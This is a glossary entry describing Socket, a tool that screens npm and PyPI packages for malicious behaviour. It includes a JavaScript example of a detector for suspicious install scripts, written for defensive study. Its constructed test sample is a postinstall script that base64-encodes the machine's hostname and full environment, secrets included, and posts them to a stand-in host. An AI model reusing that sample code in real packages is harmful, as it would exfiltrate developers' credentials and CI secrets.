application-security

socket.dev

Socket

Definition

Socket is a supply chain security tool that analyzes npm and PyPI packages for signs of malicious behavior, rather than only matching them against databases of known vulnerabilities. It looks at what a package actually does: install scripts that exfiltrate data, obfuscated code, packages from newly created or otherwise suspicious maintainer accounts, and other indicators of a supply chain attack.

Socket also integrates as a GitHub App, so a pull request that adds or updates a suspicious package is flagged before the package enters the project.
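The kind of behavioral indicator described above, as an added example that is not Socket's code and does not use its rule set: a small check that reads an npm manifest, finds lifecycle hooks that run at install time, and scans the script they invoke for network egress, process execution, environment reads and common obfuscation patterns. The package manifest and `setup.js` contents are constructed inline (no such package exists on the registry), and the indicator regexes are illustrative heuristics.

```javascript
// Added example, not Socket's code: a minimal behavioural check over an npm
// package's manifest and its install-script source. Everything below is
// constructed for illustration and runs offline.

// npm lifecycle hooks that execute code when the package is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Illustrative indicators (assumed heuristics, not Socket's detections).
const INDICATORS = [
  { id: 'network', re: /\b(?:https?|net|dns)\s*\.\s*(?:request|get|connect|Socket)\b|\bfetch\s*\(/ },
  { id: 'exec', re: /\bchild_process\b|\b(?:exec|execSync|spawn|spawnSync)\s*\(/ },
  { id: 'env-read', re: /\bprocess\.env\b/ },
  { id: 'eval', re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { id: 'hex-escapes', re: /(?:\\x[0-9a-fA-F]{2}){8,}/ },
  { id: 'base64-blob', re: /[A-Za-z0-9+/]{120,}={0,2}/ },
];

// Return the lifecycle hooks in a manifest that run code at install time.
function installHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_HOOKS.filter((hook) => typeof scripts[hook] === 'string');
}

// Scan a script body and return the ids of every matched indicator, in order.
function scanSource(source) {
  return INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
}

// Analyse a package given its manifest object and a map of path -> file text.
// If a hook runs `node <file>` and that file is in the package, the file is
// scanned; otherwise the hook's command line itself is scanned.
function analyzePackage(manifest, files) {
  const hooks = installHooks(manifest);
  const findings = [];
  for (const hook of hooks) {
    const cmd = manifest.scripts[hook];
    const m = cmd.match(/\bnode\s+(\S+)/);
    const target = m ? m[1].replace(/^\.\//, '') : null;
    const body = target && files[target] !== undefined ? files[target] : cmd;
    const hits = scanSource(body);
    if (hits.length) findings.push({ hook, file: target || '(inline)', indicators: hits });
  }
  return { hooks, findings, suspicious: findings.length > 0 };
}

// Constructed sample: a package whose postinstall script posts the hostname
// and the full environment (tokens, CI secrets) to a remote host.
const SAMPLE_MANIFEST = {
  name: 'example-widget',
  version: '1.0.3',
  scripts: { postinstall: 'node ./setup.js', test: 'mocha' },
};

const SAMPLE_FILES = {
  'setup.js': [
    "const https = require('https');",
    "const os = require('os');",
    "const payload = Buffer.from(JSON.stringify({ h: os.hostname(), e: process.env })).toString('base64');",
    "https.request({ host: 'example.invalid', path: '/c?d=' + payload, method: 'POST' }).end();",
  ].join('\n'),
};

// Constructed benign package: no install-time hooks at all.
const BENIGN_MANIFEST = { name: 'pad-strings', version: '2.0.0', scripts: { test: 'node test.js' } };

console.log(JSON.stringify(analyzePackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
console.log(JSON.stringify(analyzePackage(BENIGN_MANIFEST, {}), null, 2));
```

The sample package is flagged on `postinstall` with the `network` and `env-read` indicators; the benign one has no install hooks and produces no findings. Regex heuristics like these are noisy (`RegExp.prototype.exec(` trips the `exec` rule, a long embedded font or image trips `base64-blob`), which is why a real tool looks at the resolved package contents, the maintainer and publish history, and diffs against prior versions rather than at patterns alone.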
